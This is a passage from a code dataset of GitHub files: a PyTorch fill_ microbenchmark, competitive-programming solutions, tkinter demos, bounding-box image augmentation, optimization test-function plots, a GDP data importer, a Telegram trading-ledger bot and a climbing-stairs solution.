torch\n\nfrom torch.testing._internal.common_device_type import get_all_device_types\n\nimport operator_benchmark as op_bench\n\n\"\"\"Microbenchmark for Fill_ operator.\"\"\"\n\nfill_short_configs = op_bench.config_list(\n attr_names=[\"N\"],\n attrs=[\n [1],\n [1024],\n [2048],\n ],\n cross_product_configs={\n \"device\": [\"cpu\", \"cuda\"],\n \"dtype\": [torch.int32],\n },\n tags=[\"short\"],\n)\n\nfill_long_configs = op_bench.cross_product_configs(\n N=[10, 1000],\n device=get_all_device_types(),\n dtype=[\n torch.bool,\n torch.int8,\n torch.uint8,\n torch.int16,\n torch.int32,\n torch.int64,\n torch.half,\n 
torch.float,\n torch.double,\n ],\n tags=[\"long\"],\n)\n\n\nclass Fill_Benchmark(op_bench.TorchBenchmarkBase):\n def init(self, N, device, dtype):\n self.inputs = {\"input_one\": torch.zeros(N, device=device).type(dtype)}\n self.set_module_name(\"fill_\")\n\n def forward(self, input_one):\n return input_one.fill_(10)\n\n\nop_bench.generate_pt_test(fill_short_configs + fill_long_configs, Fill_Benchmark)\n\n\nif __name__ == \"__main__\":\n op_bench.benchmark_runner.main()\n","repo_name":"pytorch/pytorch","sub_path":"benchmarks/operator_benchmark/pt/fill_test.py","file_name":"fill_test.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"2523321347","text":"# 数论\nread = input\nrn = lambda :map(int, read().split())\nm,k = rn()\nimport math\nN = 2**(m) - 1 # 0~N\nr = [i for i in range(N+1)] # 0~N\nif k > N:\n print(-1)\n# elif N == 1 and k == 0:\n# print(0, 0)\nelif N == 1 and k == 1: # 0 0, k = 0\n print('-1')\nelif k == 0:\n for i in r:\n print(i, end=' ')\n r.reverse()\n for i in r:\n print(i, end=' ')\nelif N == 2 and k == 1: # 0 xor 1 = 1, n = 1\n print(-1)\nelse: # 0 xor 1 xor 2 ... xor 2^m - 1 = 0, n > 1, that is k = 0 xor 1 xor 2 xor k - 1 xor k + 1 ... xor 2^m - 1, k <= 2^m - 1\n for i in r:\n if i == k:continue\n print(i, end=' ')\n print(k, end=' ')\n r.reverse()\n for i in r:\n if i == k:continue\n print(i, end=' ')\n print(k, end=' ')\n \n","repo_name":"xsthunder/acm","sub_path":"at/abc126/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23537899941","text":"# this will demonstrate using simple buttons in a GUI\nimport tkinter\nimport tkinter.font as tkfont\n\n\n# set up the class\nclass ButtonWars:\n\t# set up the GUI in the init\n\tdef __init__(self):\n\t\t# first create an instance of Tk()\n\t\t# -- to initialize access to the library of tkinter widgets (classes)\n\t\t# -- and provide a master GUI window\n\t\tself.main_window = tkinter.Tk()\n\t\t# there are many options not included in your book, e.g. title\n\t\tself.main_window.title(\"Button Wars\")\n\t\t# this sets a new size for the default font for better visibility\n\t\t# not required for your projects, but helpful in the classroom\n\t\tdefault_font = tkfont.nametofont(\"TkDefaultFont\")\n\t\tdefault_font.configure(size=24)\n\n\t\t# add a couple of Frames to help organize the contents in the main_window\n\t\t# for those who know HTML, Frames are similar to divs\n\t\tself.frame_top = tkinter.Frame(self.main_window)\n\t\tself.frame_bottom = tkinter.Frame(self.main_window)\n\n\t\t# add a Label to the top frame. 
It will be used to display a message\n\t\t# so, we assign a string variable (StringVar) to the Label using textvariable\n\t\t# -- the variable provides a getter and setter to get and set the text\n\t\t# -- if no starting text is specified, it starts with an empty string\n\t\tself.message = tkinter.StringVar()\n\t\tself.message_area = tkinter.Label(self.frame_top, textvariable=self.message, width=20)\n\n\t\t# pack the label into its parent container (the top frame)\n\t\tself.message_area.pack()\n\n\t\t# add buttons to the bottom frame -- the text displays on the button itself\n\t\t# the command option assigns a method to be called when the button is pressed\n\t\tself.me_button = tkinter.Button(self.frame_bottom, text=\"Push Me!\", command=self.push_me)\n\t\tself.no_me_button = tkinter.Button(self.frame_bottom, text=\"No! Push Me!\", command=self.no_push_me)\n\t\t# this quit button calls a built-in method to destroy the window -- and end the mainloop()\n\t\tself.quit_button = tkinter.Button(self.frame_bottom, text=\"Give Up\", command=self.main_window.destroy)\n\n\n\t\t# pack the buttons into their containers -- default side is TOP\n\t\tself.me_button.pack()\n\t\tself.no_me_button.pack()\n\t\tself.quit_button.pack()\n\n\t\t# pack the frames in order from top to bottom -- default side is TOP\n\t\tself.frame_top.pack()\n\t\tself.frame_bottom.pack()\n\n\t\t# initiate the listening loop\n\t\t# remember, this is essentially an infinite loop that \"listens\" for events to occur\n\t\t# it will not exit until the quit_button command calls destroy on the main_window\n\t\ttkinter.mainloop()\n\n\t# define a method to be called for the me_button\n\tdef push_me(self):\n\t\tif self.message.get() == \"\":\n\t\t\tself.message.set(\"Wise choice!\")\n\t\telse:\n\t\t\tself.message.set(\"That's what you think!\")\n\n\t# define a method to be called for the no_me_button\n\tdef no_push_me(self):\n\t\tself.message.set(\"Haha! I win!\")\n\n\ndef main():\n\t# When I instantiate the ButtonWars class, all of the GUI objects in it will be instantiated\n\t# -- and mainloop() will be called.\n\t# Once mainloop() is called, the program waits for an event\n\t# -- (a button press, keystroke, mouse click, etc.)\n\t# -- and the relevant object is notified to handle the event.\n\t# Most of the events are handled automatically by the built-in code associated with the tkinter\n\t# -- library of objects. 
For example, you do not have to write the code that allows you to\n\t# -- type text into an Entry box.\n\t# For this course, you will be providing code for actions like button clicks.\n\n\t# since the GUI does all the work, I just need to instantiate the GUI\n\tbutton_wars = ButtonWars()\n\n\nmain()\n","repo_name":"devingrischow/school_year_2021","sub_path":"Python_2021/prg/PycharmProjects/Demos/Demo_M13_GUI_Buttons.py","file_name":"Demo_M13_GUI_Buttons.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15140578049","text":"import sys\r\ninput=sys.stdin.readline\r\nfrom itertools import accumulate\r\nsys.setrecursionlimit(10**9)\r\nmod=10**9+7\r\nn=int(input())\r\nA=list(map(int,input().split()))\r\nS=list(accumulate([pow(i,mod-2,mod) for i in range(1,n+1)]))\r\nans=0\r\nnum=1\r\nfor i in range(2,n+1):\r\n num=num*i%mod\r\nfor i in range(n):\r\n ans+=A[i]*(S[i]+S[n-1-i]-1)%mod\r\nans=ans*num%mod\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc028/B/4506706.py","file_name":"4506706.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"489947836","text":"from Tkinter import *\n\nhome = Tk()\n\nhome.title(\"programa\")\n\nhome[\"background\"]=\"blue\"\n# backgraund = bg\n\n#largura x altura + a distancia da esquerda do monitor em que\n#a janela sera upada + a distancia do topo do monitor em que sera upada\n#LxA+E+T\n# mediada em pixel\nhome.geometry(\"500x400+300+100\")\nhome.mainloop()","repo_name":"gilberto-009199/MyPython","sub_path":"tkinter/janela principal.py","file_name":"janela principal.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20657725095","text":"import cv2\nimport numpy as np\n\n\nclass DataSample(object):\n\n def __init__(self, image, bb_boxes):\n self.image = image\n self.bb_boxes = bb_boxes\n\n def resize(self, new_size):\n img_size = np.shape(self.image)\n self.image = cv2.resize(self.image, new_size)\n img_size_post = np.shape(self.image)\n self.bb_boxes['xmin'] = np.round(self.bb_boxes['xmin'] * img_size_post[1] / img_size[1])\n self.bb_boxes['xmax'] = np.round(self.bb_boxes['xmax'] * img_size_post[1] / img_size[1])\n self.bb_boxes['ymin'] = np.round(self.bb_boxes['ymin'] * img_size_post[0] / img_size[0])\n self.bb_boxes['ymax'] = np.round(self.bb_boxes['ymax'] * img_size_post[0] / img_size[0])\n self.bb_boxes['Area'] = (self.bb_boxes['xmax'] - self.bb_boxes['xmin']) * (self.bb_boxes['ymax'] - self.bb_boxes['ymin'])\n\n def merged_mask(self):\n img = self.image\n bb_boxes = self.bb_boxes\n img_mask = np.zeros_like(img[:, :, 0])\n for i in range(len(bb_boxes)):\n # plot_bbox(bb_boxes,i,'g')\n bb_box_i = [bb_boxes.iloc[i]['xmin'], bb_boxes.iloc[i]['ymin'],\n bb_boxes.iloc[i]['xmax'], bb_boxes.iloc[i]['ymax']]\n img_mask[bb_box_i[1]:bb_box_i[3], bb_box_i[0]:bb_box_i[2]] = 1\n img_mask = np.reshape(img_mask, (np.shape(img_mask)[0], np.shape(img_mask)[1], 1))\n return img_mask\n\n def translate(self, translation_range):\n # Translation augmentation\n bb_boxes_f = self.bb_boxes\n image = self.image\n\n tr_x = translation_range*np.random.uniform()-translation_range/2\n tr_y = translation_range*np.random.uniform()-translation_range/2\n\n trans_m = np.float32([[1, 0, tr_x], [0, 1, tr_y]])\n rows, cols, channels = image.shape\n 
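# keep the labels aligned with the warped image: shift every bounding box by the same random (tr_x, tr_y) offset used to build trans_m above\n 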
bb_boxes_f['xmin'] += tr_x\n bb_boxes_f['xmax'] += tr_x\n bb_boxes_f['ymin'] += tr_y\n bb_boxes_f['ymax'] += tr_y\n\n self.image = cv2.warpAffine(image, trans_m, (cols, rows))\n\n def stretch(self, scale_range):\n # Stretching augmentation\n img = self.image\n bb_boxes_f = self.bb_boxes\n # bb_boxes_f = bb_boxes_f.copy(deep=True)\n\n tr_x1 = scale_range*np.random.uniform()\n tr_y1 = scale_range*np.random.uniform()\n p1 = (tr_x1,tr_y1)\n tr_x2 = scale_range*np.random.uniform()\n tr_y2 = scale_range*np.random.uniform()\n p2 = (img.shape[1]-tr_x2,tr_y1)\n\n p3 = (img.shape[1]-tr_x2,img.shape[0]-tr_y2)\n p4 = (tr_x1,img.shape[0]-tr_y2)\n\n pts1 = np.float32([[p1[0],p1[1]],\n [p2[0],p2[1]],\n [p3[0],p3[1]],\n [p4[0],p4[1]]])\n pts2 = np.float32([[0,0],\n [img.shape[1],0],\n [img.shape[1],img.shape[0]],\n [0,img.shape[0]] ]\n )\n\n m = cv2.getPerspectiveTransform(pts1,pts2)\n img = cv2.warpPerspective(img, m, (img.shape[1], img.shape[0]))\n img = np.array(img, dtype=np.uint8)\n\n bb_boxes_f['xmin'] = (bb_boxes_f['xmin'] - p1[0])/(p2[0]-p1[0])*img.shape[1]\n bb_boxes_f['xmax'] = (bb_boxes_f['xmax'] - p1[0])/(p2[0]-p1[0])*img.shape[1]\n bb_boxes_f['ymin'] = (bb_boxes_f['ymin'] - p1[1])/(p3[1]-p1[1])*img.shape[0]\n bb_boxes_f['ymax'] = (bb_boxes_f['ymax'] - p1[1])/(p3[1]-p1[1])*img.shape[0]\n self.image = img\n\n def copy(self):\n return DataSample(self.image.copy(), self.bb_boxes.copy(deep=True))","repo_name":"gregorej/computer-vision-playground","sub_path":"vehicle_recognition/data_sample.py","file_name":"data_sample.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14993680016","text":"\"\"\"Telegram transactions command\"\"\"\n\n# pylint: disable=unused-argument\n\nfrom telegram import ParseMode\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, \\\n ConversationHandler\nfrom rival_regions_calc import Value\n\nfrom handelsraad_bot import LOGGER, ITEMS, ITEMS_INV, database, util\nfrom handelsraad_bot.telegram_bot import transaction\n\n\nINSTRUCTIONS = \"\"\"```\n/sell \n/buy \n/add \n```\nbijvoorbeeld:\n```\n/sell uranium 1kk 2000\n/add uranium 1kk 2kkk\n/buy oil 10kkk 190\n/add oil 10kkk -1900kkk```\"\"\"\n\n\ndef print_transaction(update, context):\n \"\"\"Print transaction\"\"\"\n index = 1\n total_money = 0\n transaction_msg = [\n 'Transaction omschrijving: \"{}\"'.format(\n context.user_data['transaction']['description']\n ),\n 'Details:',\n '```',\n ]\n for detail in context.user_data['transaction']['details']:\n transaction_msg.append(\n '{}: {:>8} {:10} $ {:>8}'.format(\n index,\n str(detail['amount']),\n ITEMS_INV[detail['item_id']],\n str(detail['money'])\n )\n )\n index += 1\n total_money += detail['money']\n\n transaction_msg.append('```')\n transaction_msg.append('Totaal geld: $ {}'.format(Value(total_money)))\n\n update.message.reply_text(\n '\\n'.join(transaction_msg),\n parse_mode=ParseMode.MARKDOWN\n )\n\n\ndef conv_transaction_start(update, context):\n \"\"\"Start message\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD start',\n update.message.from_user.username\n )\n if not util.check_permission(\n update, ['trader', 'chairman'], 'CONV add_transaction'\n ):\n return ConversationHandler.END\n update.message.reply_text('Stuur de beschrijving voor transactie:')\n\n return TRANSACTION\n\n\ndef conv_transaction_ask_details(update, context):\n \"\"\"Transaction ask details\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, description: \"%s\"',\n 
update.message.from_user.username,\n update.message.text\n )\n context.user_data['transaction'] = {\n 'telegram_username': update.message.from_user.username,\n 'telegram_id': update.message.from_user.id,\n 'description': update.message.text,\n 'details': [],\n }\n update.message.reply_text(\n 'Voeg transactie details toe.\\n' + INSTRUCTIONS,\n parse_mode=ParseMode.MARKDOWN\n )\n\n return DETAIL\n\n\ndef conv_transaction_detail_add(update, context):\n \"\"\"Add transaction detail\"\"\"\n command = update.message.text.split(' ')[0]\n LOGGER.info(\n '%s: CONV add_transaction, CMD %s',\n update.message.from_user.username,\n command\n )\n try:\n item_id = ITEMS[context.args[0]]\n except (IndexError, KeyError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect item name',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n try:\n if command == '/sell':\n amount = Value(-abs(Value(context.args[1])))\n elif command == '/buy':\n amount = Value(abs(Value(context.args[1])))\n except (IndexError, ValueError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect amount',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n try:\n price = Value(context.args[2])\n except (IndexError, ValueError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect price each',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n if command == '/sell':\n price = abs(amount * price)\n elif command == '/buy':\n price = -abs(amount * price)\n\n context.user_data['transaction']['details'].append({\n 'item_id': item_id,\n 'amount': amount,\n 'money': Value(price),\n })\n\n print_transaction(update, context)\n\n update.message.reply_text(\n 'Voeg meer details toe '\n 'of verwijder details met: `/remove `. '\n 'Sla de transactie op met: `/save`.',\n parse_mode=ParseMode.MARKDOWN\n )\n\n return DETAIL\n\n\n# def conv_transaction_detail_buy(update, context):\n# \"\"\"Add buy transaction detail\"\"\"\n\n\n# def conv_transaction_detail_add(update, context):\n# \"\"\"Add transaction detail\"\"\"\n\n\ndef conv_transaction_detail_remove(update, context):\n \"\"\"Remove transaction detail\"\"\"\n try:\n index = int(context.args[0]) - 1\n except (IndexError, ValueError):\n update.message.reply_text(\n 'geeft detail nummer te verwijderen '\n 'met: `/remove `.',\n parse_mode=ParseMode.MARKDOWN\n )\n return DETAIL\n\n try:\n context.user_data['transaction']['details'].pop(index)\n except IndexError:\n update.message.reply_text(\n 'Sorry, die index bestaat niet.'\n )\n return DETAIL\n\n update.message.reply_text(\n 'Transactie detail verwijderd. '\n 'Voeg meer details toe '\n 'of verwijder details met: `/remove `. '\n 'Sla de transactie op met: `/save`.',\n parse_mode=ParseMode.MARKDOWN\n )\n print_transaction(update, context)\n\n return DETAIL\n\n\ndef conv_transaction_save(update, context):\n \"\"\"Save transaction\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD save',\n update.message.from_user.username\n )\n\n if len(context.user_data['transaction']['details']) == 0:\n update.message.reply_text(\n 'Oelewapper! 
'\n 'Je hebt geen transactie details toegevoegd.\n' + INSTRUCTIONS,\n parse_mode=ParseMode.MARKDOWN\n )\n return DETAIL\n\n database.save_transaction(context.user_data['transaction'])\n\n update.message.reply_text('Transaction opgeslagen')\n context.user_data.clear()\n\n transaction.cmd_transactions(update, context)\n\n return ConversationHandler.END\n\n\ndef conv_transaction_cancel(update, context):\n \"\"\"Cancel transaction\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD cancel',\n update.message.from_user.username\n )\n update.message.reply_text('Transaction gecanceld.')\n context.user_data.clear()\n\n return ConversationHandler.END\n\n\nTRANSACTION, DETAIL = range(2)\n\n\n# add transaction conversation\nconversation = ConversationHandler(\n entry_points=[\n CommandHandler(\n 'add_transaction',\n conv_transaction_start\n )\n ],\n states={\n TRANSACTION: [\n MessageHandler(\n Filters.text,\n conv_transaction_ask_details\n )\n ],\n DETAIL: [\n CommandHandler(\n 'sell',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'buy',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'add',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'remove',\n conv_transaction_detail_remove\n ),\n CommandHandler(\n 'save',\n conv_transaction_save\n ),\n ]\n },\n fallbacks=[\n CommandHandler(\n 'cancel',\n conv_transaction_cancel\n )\n ]\n )\n","repo_name":"joostsijm/handelsraad_bot","sub_path":"src/handelsraad_bot/telegram_bot/add_transaction.py","file_name":"add_transaction.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15999328357","text":"from mpl_toolkits import mplot3d\nimport numpy as np\nfrom math import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n \ndef draw(function, bound, title):\n x = np.linspace(-1*bound, bound, 100)\n y = np.linspace(-1*bound, bound, 100)\n \n X, Y = np.meshgrid(x, y)\n Z = function([X, Y])\n \n fig = plt.figure()\n ax = plt.axes(projection ='3d')\n ax.plot_wireframe(X, Y, Z, color ='green')\n ax.set_title(title)\n \n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, cmap=cm.jet,\n linewidth=0, antialiased=False)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n plt.show()\n \n\n\ndef f_ackley(position, a=20, b=0.2, c=2*pi):\n d = len(position)\n\n sum1 = 0\n sum2 = 0\n for pos in position:\n sum1 = sum1 + pos**2\n sum2 = sum2 + cos(c*pos)\n\n term1 = -a * exp(-b*sqrt(sum1/d))\n term2 = -exp(sum2/d)\n\n return term1 + term2 + a + exp(1)\n\ndef f_f2(position):\n d = len(position)\n sum = 0\n\n for ii in range (1, d+1):\n xi = position[ii-1]\n sum = sum + (xi-ii)**2\n\n return sum\n\ndef fitnessFunc(chromosome):\n\t\"\"\"F6 Griewank's function\n\tmultimodal, symmetric, inseparable\"\"\"\n\tpart1 = 0\n\tfor i in range(len(chromosome)):\n\t\tpart1 += chromosome[i]**2\n\t\tpart2 = 1\n\tfor i in range(len(chromosome)):\n\t\tpart2 *= cos(float(chromosome[i]) / sqrt(i+1))\n\treturn 1 + (float(part1)/4000.0) - float(part2)\n \ndef f_griewank(position):\n d = len(position)\n sum = 0\n prod = 1\n\n x1 = position[0]\n x2 = position[1]\n sum = (x1**2)/4000 + (x2**2)/4000\n xd1 = x1 / sqrt(1)\n xd2 = x2 / sqrt(2)\n prod = cos(xd1) * cos(xd2)\n # for ii in range(0, d):\n # xi = position[ii]\n # sum = sum + (xi**2)/4000\n # prod = prod * cos(xi/sqrt(ii+1))\n\n return sum - prod + 1\n\n\ndef f_rastrigin(position):\n d = len(position)\n sum = 0\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum = sum + (xi**2 
- 10*cos(2*pi*xi) + 10)\n\n return sum\n\n\ndef f_rosenbrock(position):\n d = len(position)\n sum = 0\n\n for ii in range(1, d):\n xi = position[ii] #x i+1\n xii = position[ii-1] #x i\n sum += 100*((xi**2)-xii)**2+(1-xi)**2\n \n return sum\n \ndef f_schwefel(position):\n d = len(position)\n sum = 0\n prod = 1\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum = sum + xi**2\n prod = prod * abs(xi)\n\n return sum + prod\n\n\ndef f_sphere(position):\n d = len(position)\n sum = 0\n\n for ii in range (1, d+1):\n xi = position[ii-1]\n sum = sum + xi**2\n\n return sum\n\n \ndef f_zakharov(position):\n d = len(position)\n sum1 = 0\n sum2 = 0\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum1 = sum1 + xi**2\n sum2 = sum2 + 0.5*ii*xi\n \n return sum1 + sum2**2 + sum2**4\n\n\n\n\n \ndraw(f_sphere, 100, \"Funkcja Sphere\")\ndraw(f_f2, 100, \"Funkcja F2\")\ndraw(f_rosenbrock, 2.048, \"Funkcja Rosenbrock\")\n# draw(fitnessFunc, 600, \"Funkcja Griewank\")\n# draw(f_rastrigin, 5.12, \"Funkcja Rastrigin\")\n# draw(f_ackley, 32, \"Funkcja Ackley\")\ndraw(f_schwefel, 10, \"Funkcja Schwefel\")\ndraw(f_zakharov, 10, \"Funkcja Zakharov\")","repo_name":"pawelciupka/particle-swarm-optimization-test-app","sub_path":"functions/drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31535409999","text":"import requests\nimport json\nimport pandas as pd\nfrom datetime import date\nimport psycopg2\nfrom sqlalchemy import create_engine\n\n###############################\n## Start by getting GDP data ##\n###############################\nresponse_api = requests.get(\n \"http://api.worldbank.org/v2/country/all/indicator/NY.GDP.MKTP.CN?date=1950:2022&format=json&per_page=150000\"\n)\n\ndata_json=response_api.json()\n# convert json format to dataframe\ndf_gdp = pd.json_normalize(\n data_json[1], meta=['value', 'country', 'date', 'countryiso3code']\n) \n\n# rename column names and remove nas\ndf_gdp = df_gdp[['countryiso3code', 'date', 'value']].rename(\n columns={\n 'value':'GDP_lcu'\n }\n)\n\ndf_gdp['date'] = pd.to_numeric(df_gdp['date'])\ndf_gdp.dropna(inplace=True)\n\n\n######################################################### \n### For Taiwan we need to get the data from IMF API as ##\n### it is not published by the World Bank. 
##\nresponse_api = requests.get(\n \"https://www.imf.org/external/datamapper/api/v1/NGDPD/TWN\"\n)\n\ndata_json=response_api.json()\ndate = list()\ncountryiso3code = list()\nGDP = list()\n\nfor key in data_json['values']['NGDPD']['TWN'].keys():\n date.append(key)\n countryiso3code.append(\"TWN\")\n GDP.append(data_json['values']['NGDPD']['TWN'][key])\n\ndf_gdp_taiwan = pd.DataFrame(\n {\n \"countryiso3code\": countryiso3code,\n \"date\":date,\n \"GDP_lcu\":GDP\n }\n)\n\n## Note that I cannot find an appropriate API for conversion, so for TAIWAN \n## the conversion is given in terms of dollars.\n\n## Concatenate df_gdp_taiwan with df_gdp\nif \"TWN\" in pd.unique(df_gdp['countryiso3code']).tolist():\n ...\nelse:\n df_gdp = pd.concat(\n (\n df_gdp,\n df_gdp_taiwan\n ),\n ignore_index=True\n )\n\n\ndf_gdp.loc[:,\"date\"] = pd.to_datetime(df_gdp.loc[:,\"date\"], format=\"%Y\").dt.date\n\n## send to database\nengine = create_engine(f'postgresql://{\"postgres\"}:{\"password\"}@{\"localhost\"}:{5432}/{\"country-db\"}')\ndf_gdp.to_sql('gdp', engine, if_exists='replace')\nengine.dispose()","repo_name":"koba96/index-tracker","sub_path":"import-gdp-data.py","file_name":"import-gdp-data.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25837223259","text":"\"\"\"\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps.\n\nIn how many distinct ways can you climb to the top?\n\nExample 1:\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\n\nExample 2:\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\nConstraints:\n 1 <= n <= 45\n\nLearning:\n- Better to create an internal additional method\n- Brute force approach implemented in Solution 1 using recursion. O(2^n). Possible\n optimization would be adding memoization (a dict of already known step results)\n- Alternatively and more optimal would be Dynamic Programming with O(n), solution 2.\n It breaks the problem into subproblems\n\"\"\"\n\n\nclass Solution1:\n def climbStairs(self, n: int) -> int:\n return self._climbStairs(0, n)\n\n def _climbStairs(self, i, n):\n if i > n:\n return 0\n elif i == n:\n return 1\n sol = self._climbStairs(i + 1, n) + self._climbStairs(i + 2, n)\n print(\"sol:\", sol)\n return sol\n\n\nclass Solution2:\n def climbStairs(self, n: int) -> int:\n if n == 1:\n return 1\n sol = [0] * (n + 1)\n sol[1], sol[2] = 1, 2\n\n for i in range(3, n + 1):\n sol[i] = sol[i - 2] + sol[i - 1]\n return sol[n]\n\n\n# Recursion\nsol = Solution1().climbStairs(n=2)\nprint(sol == 2)\n\nsol = Solution1().climbStairs(n=3)\nprint(sol == 3)\n\nsol = Solution1().climbStairs(n=4)\nprint(sol == 5)\n\n\n# Dynamic Programming\nsol = Solution2().climbStairs(n=2)\nprint(sol == 2)\n\nsol = Solution2().climbStairs(n=3)\nprint(sol == 3)\n\nsol = Solution2().climbStairs(n=4)\nprint(sol == 5)\n\nsol = Solution2().climbStairs(n=5)\nprint(sol == 8)\n","repo_name":"eherrerosj/mle-tech-interviews","sub_path":"data-structure-challenges/leetcode/70. Climbing Stairs.py","file_name":"70. 
Climbing Stairs.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"25938111619","text":"'''Sistema para acréscimo de nota\nConforme combinado com os estudantes:\n-Aluno com nota azul no trabalho recebe um ponto na média\n-Aluno com nota vermelha no trabalho perde 0,5 ponto na prova mensal\n-Com a média azul sendo par o aluno recebe uma caneta azul de prêmio,\ncaso seja ímpar recebe uma caneta preta.'''\n\nprint('Sistema para acréscimo de nota')\np1=float(input('Entre com a nota da prova mensal: '));\np2=float(input('Entre com a nota da prova semestral: '));\ntrab=float(input('Entre com a nota do trabalho: '));\n\nmedia=((p1*3.0)+(p2*4.5)+(trab*2.5))/10\npremio=media%2.00\n\nif p1>=0 and p1<=10.00 and p2>=0 and p2<=10.00 and trab>=0 and trab<=10.00:\n if trab>=6.00 and media!=10.00:\n media+=1 \n if media>=10:\n media=10\n print('A média do aluno é: %.2f' %media)\n if media>=6.00:\n if premio==0:\n print('Aluno ganha caneta azul')\n else:\n print('Aluno ganha caneta preta')\n else:\n print('Aluno não ganha prêmio')\n elif trab<=6.00:\n p1=p1-0.5\n print('A média do aluno é: %.2f' %media)\n if media>=6.00:\n if premio==0:\n print('Aluno ganha caneta azul')\n else:\n print('Aluno ganha caneta preta')\n else:\n print('Aluno não ganha prêmio')\nelse:\n print('Os valores das notas são inválidos!')\n\n\n \n\n\n\n \n","repo_name":"GGreenBow/Python-Facul","sub_path":"Atividades Avaliativas/Trabalho 1/T1_Q4.py","file_name":"T1_Q4.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23209163198","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx = np.array([80, 85, 90, 95, 100, 105, 110, 115, 120, 125])\r\ny = np.array([240, 250, 260, 270, 280, 290, 300, 310, 320, 330])\r\n\r\nplt.plot(x, y)\r\nFONT1={'family':'serif','color':'green','size':'20'}\r\nFONT2={'family':'serif','color':'yellow','size':'40'}\r\n\r\nplt.xlabel(\"Average Pulse\",fontdict=FONT1)\r\nplt.ylabel(\"Calorie Burnage\",fontdict=FONT2)\r\nplt.title(\"shanwaz\")\r\nplt.show()","repo_name":"Sohail-yt/Practising-for-jobs","sub_path":"Learning/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12501088362","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox\nimport os\n\ndef get_user_values():\n root = tk.Tk()\n\n # Funktion zum Speichern der Werte und Beenden der GUI\n def save_values():\n\n global p_req, roughness_length, p_min, single_cell_energy, single_cell_cost, interest_rate, lifetime, capex, save_path_powerdata, data_power_curve_path, data_tech_path, data_wind_path\n p_req = float(entry_p_req.get())\n roughness_length = float(entry_roughness_length.get())\n p_min = float(entry_p_min.get())\n single_cell_energy = float(entry_single_cell_energy.get())\n single_cell_cost = float(entry_single_cell_cost.get())\n interest_rate = float(entry_interest_rate.get())\n lifetime = int(entry_lifetime.get())\n capex = float(entry_capex.get())\n save_path_powerdata = entry_save_path_powerdata.get()\n data_power_curve_path = var_data_power_curve_path.get()\n data_tech_path = var_data_tech_path.get()\n data_wind_path = var_data_wind_path.get()\n\n root.destroy()\n\n root.title(\"Eingabewerte\")\n root.geometry(\"400x550\") # Vergrößert die Höhe des Fensters\n\n # Label und 
